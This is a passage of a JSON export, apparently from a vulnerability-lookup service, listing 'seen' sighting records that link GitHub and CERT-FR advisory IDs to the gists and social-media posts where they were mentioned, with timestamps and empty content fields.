"", "creation_timestamp": "2025-07-16T11:50:34.000000Z"}, {"uuid": "a438eaf4-6fec-4c91-b71d-21c78d4897e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/4e4c49aa91979c33a80a1c0408ee55df", "content": "", "creation_timestamp": "2025-07-16T11:50:34.000000Z"}, {"uuid": "6ba04f6f-88f3-4c2f-86f7-b3e311c16cd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4q84-546j-3mf5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114831099385159796", "content": "", "creation_timestamp": "2025-07-10T21:38:43.840197Z"}, {"uuid": "9e2f5ae1-f8ca-4992-940c-12980fff997d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/4446ec375ef2be6d92b5e6d3e822ae40", "content": "", "creation_timestamp": "2025-07-16T06:15:41.000000Z"}, {"uuid": "35aa2212-7c02-4c5b-ae50-bd2627cbae97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcwr-x25h-x5fh", "type": "seen", "source": "https://gist.github.com/safer-bot/4446ec375ef2be6d92b5e6d3e822ae40", "content": "", "creation_timestamp": "2025-07-16T06:15:41.000000Z"}, {"uuid": "135f1bea-cb57-4bf3-9459-b4cd89bcb1a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g6ph-x5wf-g337", "type": "seen", "source": "https://gist.github.com/safer-bot/4446ec375ef2be6d92b5e6d3e822ae40", "content": "", "creation_timestamp": "2025-07-16T06:15:41.000000Z"}, {"uuid": "158efc81-a131-4c76-9574-4bea48fa6314", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/4446ec375ef2be6d92b5e6d3e822ae40", "content": "", "creation_timestamp": "2025-07-16T06:15:41.000000Z"}, {"uuid": "91367e45-448b-4c20-a8ac-264c54de1302", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/4446ec375ef2be6d92b5e6d3e822ae40", "content": "", "creation_timestamp": "2025-07-16T06:15:41.000000Z"}, {"uuid": "fdaa319b-8324-48e0-ac10-1bb107cdba14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/4446ec375ef2be6d92b5e6d3e822ae40", "content": "", "creation_timestamp": "2025-07-16T06:15:41.000000Z"}, {"uuid": "a995266e-7949-4ff8-bcee-5e867beac36b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/4446ec375ef2be6d92b5e6d3e822ae40", "content": "", "creation_timestamp": "2025-07-16T06:15:41.000000Z"}, {"uuid": "25a85d91-70b5-42b3-a17d-afc9351d73ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhgr-952r-6p8q", "type": "seen", "source": "https://gist.github.com/safer-bot/4446ec375ef2be6d92b5e6d3e822ae40", "content": "", "creation_timestamp": "2025-07-16T06:15:41.000000Z"}, {"uuid": "9f4615f7-76cb-46a8-94d9-e4a2be34c8c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2f88-5hg8-9x2x", "type": "seen", "source": "https://gist.github.com/safer-bot/4446ec375ef2be6d92b5e6d3e822ae40", "content": "", "creation_timestamp": "2025-07-16T06:15:41.000000Z"}, {"uuid": "aa2ba9cc-54e5-461d-af0e-2bfe02013805", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mjmj-j48q-9wg2", "type": "seen", "source": "https://gist.github.com/safer-bot/e45016e80aca46d7918ba499cafa1af0", "content": "", "creation_timestamp": "2025-07-16T09:57:34.000000Z"}, {"uuid": "d9b24c15-18d2-4da8-b4ec-c0d35de80d21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6mwm-v2vv-pp96", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114831114266746840", "content": "", "creation_timestamp": "2025-07-10T21:42:30.904952Z"}, {"uuid": "9dd20c2d-bcff-4b88-9fe1-6940e2171f22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-chfm-68vv-pvw5", "type": "seen", "source": "https://gist.github.com/safer-bot/8eca23c82e8673ef724e0c5a372b6883", "content": "", "creation_timestamp": "2025-07-16T06:24:47.000000Z"}, {"uuid": "e2bb28ca-853c-4a5d-a7c2-9c532268d061", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/4e4c49aa91979c33a80a1c0408ee55df", "content": "", "creation_timestamp": "2025-07-16T11:50:34.000000Z"}, {"uuid": "2a6c7aa5-ba8c-4b2e-a5dc-a55a56b6cf94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gp7f-rwcx-9369", "type": "seen", "source": "https://gist.github.com/safer-bot/4e4c49aa91979c33a80a1c0408ee55df", "content": "", "creation_timestamp": "2025-07-16T11:50:34.000000Z"}, {"uuid": "68d37fea-5d18-4093-8de9-669393543dd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/3815934410df30c04b7a1dba5b8d2ead", "content": "", "creation_timestamp": "2025-07-16T13:02:55.000000Z"}, {"uuid": "8eb12c53-8154-4d22-a4ce-3397a8d95ccc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/3815934410df30c04b7a1dba5b8d2ead", "content": "", "creation_timestamp": "2025-07-16T13:02:55.000000Z"}, {"uuid": "b703090b-dd0f-4e9e-a659-b0f42a823324", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/9bba59f11acbede980eca69fe6dd3220", "content": "", "creation_timestamp": "2025-07-16T13:01:38.000000Z"}, {"uuid": "dbdcbd31-ebce-4cc1-9aec-80d5e6b4a64a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/1915b7b93f8ad1ca501373e767521f49", "content": "", "creation_timestamp": "2025-07-16T13:56:02.000000Z"}, {"uuid": "eebee58a-cd64-4a80-ac92-f4d7e37fa813", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-028", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lttbvcvtvv25", "content": "", "creation_timestamp": "2025-07-13T06:50:49.107094Z"}, {"uuid": "1c6373bb-f8bb-4181-a1ac-93fa17715bb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/47006014379551b412652b892b869485", "content": "", "creation_timestamp": "2025-07-16T06:26:25.000000Z"}, {"uuid": "d055d86f-178d-4f70-be0a-b794f8641c67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/47006014379551b412652b892b869485", "content": "", "creation_timestamp": "2025-07-16T06:26:25.000000Z"}, {"uuid": "fdb82593-9de3-4eab-8b59-775ef92dacf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/47006014379551b412652b892b869485", "content": "", "creation_timestamp": "2025-07-16T06:26:25.000000Z"}, {"uuid": "e8808bb7-8cab-4f48-b8c6-c1c7317c840b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhgr-952r-6p8q", "type": "seen", "source": "https://gist.github.com/safer-bot/47006014379551b412652b892b869485", "content": "", "creation_timestamp": "2025-07-16T06:26:25.000000Z"}, {"uuid": "dc8c7391-549d-4b3d-ad14-ccb4b9766587", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/b8fb1a9a38b9f83342e2296de2169361", "content": "", "creation_timestamp": "2025-07-16T11:52:48.000000Z"}, {"uuid": "98298037-284d-41df-9982-46e88ed903f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/b8fb1a9a38b9f83342e2296de2169361", "content": "", "creation_timestamp": "2025-07-16T11:52:48.000000Z"}, {"uuid": "f56236f9-06d7-43aa-a794-4b2ec6fac578", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/b8fb1a9a38b9f83342e2296de2169361", "content": "", "creation_timestamp": "2025-07-16T11:52:48.000000Z"}, {"uuid": "2e05a62d-22e4-4f3d-aa65-9ecd855c4437", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/b8fb1a9a38b9f83342e2296de2169361", "content": "", "creation_timestamp": "2025-07-16T11:52:48.000000Z"}, {"uuid": "93652f33-8b70-4d1b-b220-8dd298e89ad5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/b8fb1a9a38b9f83342e2296de2169361", "content": "", "creation_timestamp": "2025-07-16T11:52:48.000000Z"}, {"uuid": "e1f2799c-2925-47f5-a770-0f7cb26a1d64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/b8fb1a9a38b9f83342e2296de2169361", "content": "", "creation_timestamp": "2025-07-16T11:52:48.000000Z"}, {"uuid": "bdb982a0-5d6e-4205-bbb7-04b729897550", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/9bba59f11acbede980eca69fe6dd3220", "content": "", "creation_timestamp": "2025-07-16T13:01:38.000000Z"}, {"uuid": "61faf286-afaa-4cff-be20-6d48e5738b8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-352j-376q-2pmc", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114614853194971118", "content": "", "creation_timestamp": "2025-06-02T17:04:29.639669Z"}, {"uuid": "1996b63d-8a8b-4114-a89d-394d5bc9c2d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-43g3-qpwq-hfgg", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114773857240569021", "content": "", "creation_timestamp": "2025-06-30T19:01:18.131959Z"}, {"uuid": "68906689-ee87-419a-a0c6-36a4373da09e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgqp-3mmf-7h8f", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q2/273", "content": "", "creation_timestamp": "2025-06-23T23:32:45.000000Z"}, {"uuid": "4262da09-b1db-4b9f-92e8-050fb0d71f28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-029", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114857653159250624", "content": "", "creation_timestamp": "2025-07-15T14:11:44.155692Z"}, {"uuid": "ffde26f4-6fa3-4152-bb65-bd5ccc520b02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mjmj-j48q-9wg2", "type": "seen", "source": "https://gist.github.com/safer-bot/0be0b98675baf83de42e33ed5c8ca55e", "content": "", "creation_timestamp": "2025-07-16T06:34:04.000000Z"}, {"uuid": "7f861ccf-0a68-43d0-a666-f1d53e13e199", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/57d1be3f9c1c6a213d72cfb45039a3de", "content": "", "creation_timestamp": "2025-07-16T11:55:29.000000Z"}, {"uuid": "82813801-8496-4549-892d-4cd6a2aafcdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/ac7888cd348a2c9b5cedd341ce88aeae", "content": "", "creation_timestamp": "2025-07-16T13:09:25.000000Z"}, {"uuid": "2a7b663f-1911-4dce-87fd-cbb744ced594", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w8p2-wjjr-hr24", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114773893007684210", "content": "", "creation_timestamp": "2025-06-30T19:10:24.884664Z"}, {"uuid": "c3fddfb8-17f8-40e1-9d57-8920f50617be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/4b73ef8853076dda61665c14d9900402", "content": "", "creation_timestamp": "2025-07-16T06:36:45.000000Z"}, {"uuid": "1bb9f54e-9c2e-4187-82b9-b3ec490f0d6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/4b73ef8853076dda61665c14d9900402", "content": "", "creation_timestamp": "2025-07-16T06:36:45.000000Z"}, {"uuid": "66e9de39-b01c-45c1-a004-6cc0d596da61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/4b73ef8853076dda61665c14d9900402", "content": "", "creation_timestamp": "2025-07-16T06:36:45.000000Z"}, {"uuid": "ca7a0020-89a1-4aca-9610-13d9a9e8684d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/4b73ef8853076dda61665c14d9900402", "content": "", "creation_timestamp": "2025-07-16T06:36:45.000000Z"}, {"uuid": "288f5eeb-725e-4c7c-b530-166cea8a3f34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/4b73ef8853076dda61665c14d9900402", "content": "", "creation_timestamp": "2025-07-16T06:36:45.000000Z"}, {"uuid": "bbd7db56-1af4-4d83-9334-798de9a2b26a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/4b73ef8853076dda61665c14d9900402", "content": "", "creation_timestamp": "2025-07-16T06:36:45.000000Z"}, {"uuid": "a8bbd0b2-f66d-489e-8f21-d4a17206a92a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/4b73ef8853076dda61665c14d9900402", "content": "", "creation_timestamp": "2025-07-16T06:36:45.000000Z"}, {"uuid": "a56563a5-e73e-4ca8-837b-99af79edf3de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-014", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lmp4bjj2uq2u", "content": "", "creation_timestamp": "2025-04-13T13:03:15.427329Z"}, {"uuid": "a131afb3-0bdf-49e7-8d53-ac1de54c3a11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/363d2b73e3bbac588e736804f42b6a98", "content": "", "creation_timestamp": "2025-06-17T01:20:50.000000Z"}, {"uuid": "d3ddc2bf-e3f6-4b6f-946e-c7dc2234c0fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w97f-w3hq-36g2", "type": "seen", "source": "https://gist.github.com/safer-bot/363d2b73e3bbac588e736804f42b6a98", "content": "", "creation_timestamp": "2025-06-17T01:20:50.000000Z"}, {"uuid": "cf5ad9bc-a369-4a94-8b3e-b2f362d1ab32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw7r-rxff-gv24", "type": "seen", "source": "https://gist.github.com/safer-bot/363d2b73e3bbac588e736804f42b6a98", "content": "", "creation_timestamp": "2025-06-17T01:20:50.000000Z"}, {"uuid": "6b85ebcd-d75e-4088-835f-504fd88f7c75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4xq-445g-g6ch", "type": "seen", "source": "https://gist.github.com/safer-bot/363d2b73e3bbac588e736804f42b6a98", "content": "", "creation_timestamp": "2025-06-17T01:20:50.000000Z"}, {"uuid": "e24e1401-50f6-437b-8194-0b5dd7ef7a37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xmmm-jw76-q7vg", "type": "seen", "source": "https://gist.github.com/safer-bot/363d2b73e3bbac588e736804f42b6a98", "content": "", "creation_timestamp": "2025-06-17T01:20:50.000000Z"}, {"uuid": "10b22846-c1fe-46f5-bf7c-c1de52b9a8a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g4gc-rh26-m3p5", "type": "seen", "source": "https://gist.github.com/safer-bot/363d2b73e3bbac588e736804f42b6a98", "content": "", "creation_timestamp": "2025-06-17T01:20:50.000000Z"}, {"uuid": "c26ae46d-5fab-4a97-b8d6-4bf7f7b83f8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9vm7-v8wj-3fqw", "type": "seen", "source": "https://gist.github.com/safer-bot/363d2b73e3bbac588e736804f42b6a98", "content": "", "creation_timestamp": "2025-06-17T01:20:50.000000Z"}, {"uuid": "554dcc61-4356-4e47-8c0d-cde314d861a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/363d2b73e3bbac588e736804f42b6a98", "content": "", "creation_timestamp": "2025-06-17T01:20:50.000000Z"}, {"uuid": "bb7d3021-4b7d-4efa-a2fd-ad765def09d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93ww-43rr-79v3", "type": "seen", "source": "https://gist.github.com/safer-bot/363d2b73e3bbac588e736804f42b6a98", "content": "", "creation_timestamp": "2025-06-17T01:20:50.000000Z"}, {"uuid": "2862a185-5546-4a57-8533-a22bd0959142", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/363d2b73e3bbac588e736804f42b6a98", "content": "", "creation_timestamp": "2025-06-17T01:20:50.000000Z"}, {"uuid": "a47ed796-8b05-46f0-b150-37bfe7493c52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/6199ef83846a3a8c73ace495b0e000fc", "content": "", "creation_timestamp": "2025-06-17T01:29:13.000000Z"}, {"uuid": "d343d0ed-4037-43ec-89b7-c9e72b740a40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w97f-w3hq-36g2", "type": "seen", "source": "https://gist.github.com/safer-bot/6199ef83846a3a8c73ace495b0e000fc", "content": "", "creation_timestamp": "2025-06-17T01:29:13.000000Z"}, {"uuid": "f7e3bbcb-0c91-443a-9e03-05d45b07a17a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw7r-rxff-gv24", "type": "seen", "source": "https://gist.github.com/safer-bot/6199ef83846a3a8c73ace495b0e000fc", "content": "", "creation_timestamp": "2025-06-17T01:29:13.000000Z"}, {"uuid": "5eab88a2-4724-4de6-8676-a3c77547438b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4xq-445g-g6ch", "type": "seen", "source": "https://gist.github.com/safer-bot/6199ef83846a3a8c73ace495b0e000fc", "content": "", "creation_timestamp": "2025-06-17T01:29:13.000000Z"}, {"uuid": "ae2c654e-907a-4be3-b900-455ebc595159", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xmmm-jw76-q7vg", "type": "seen", "source": "https://gist.github.com/safer-bot/6199ef83846a3a8c73ace495b0e000fc", "content": "", "creation_timestamp": "2025-06-17T01:29:13.000000Z"}, {"uuid": "e7e0dd42-45dc-4fee-95cd-10f3e3e4005b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g4gc-rh26-m3p5", "type": "seen", "source": "https://gist.github.com/safer-bot/6199ef83846a3a8c73ace495b0e000fc", "content": "", "creation_timestamp": "2025-06-17T01:29:13.000000Z"}, {"uuid": "80e0b0fa-d623-43c6-b860-ea44fcd0801e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9vm7-v8wj-3fqw", "type": "seen", "source": "https://gist.github.com/safer-bot/6199ef83846a3a8c73ace495b0e000fc", "content": "", "creation_timestamp": "2025-06-17T01:29:13.000000Z"}, {"uuid": "bdd26307-a914-4efb-bda8-1591258cedab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/6199ef83846a3a8c73ace495b0e000fc", "content": "", "creation_timestamp": "2025-06-17T01:29:13.000000Z"}, {"uuid": "fd6071ae-76c3-4cd5-b0dc-b9f7fb99ebc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93ww-43rr-79v3", "type": "seen", "source": "https://gist.github.com/safer-bot/6199ef83846a3a8c73ace495b0e000fc", "content": "", "creation_timestamp": "2025-06-17T01:29:13.000000Z"}, {"uuid": "42ea91a7-712d-48ae-97a5-db3f99af9f5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/6199ef83846a3a8c73ace495b0e000fc", "content": "", "creation_timestamp": "2025-06-17T01:29:13.000000Z"}, {"uuid": "1d473ecd-1679-43ee-a8b4-7c61ef533441", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xwgg-m7fx-83wx", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114535847071295088", "content": "", "creation_timestamp": "2025-05-19T18:12:11.232282Z"}, {"uuid": "31801640-0214-4ff0-bc3c-90c3911a23ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/2a07e4eb98bcdb60260dd20c1d06293e", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "1095ba11-3449-4264-8545-e6a9f1a186fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 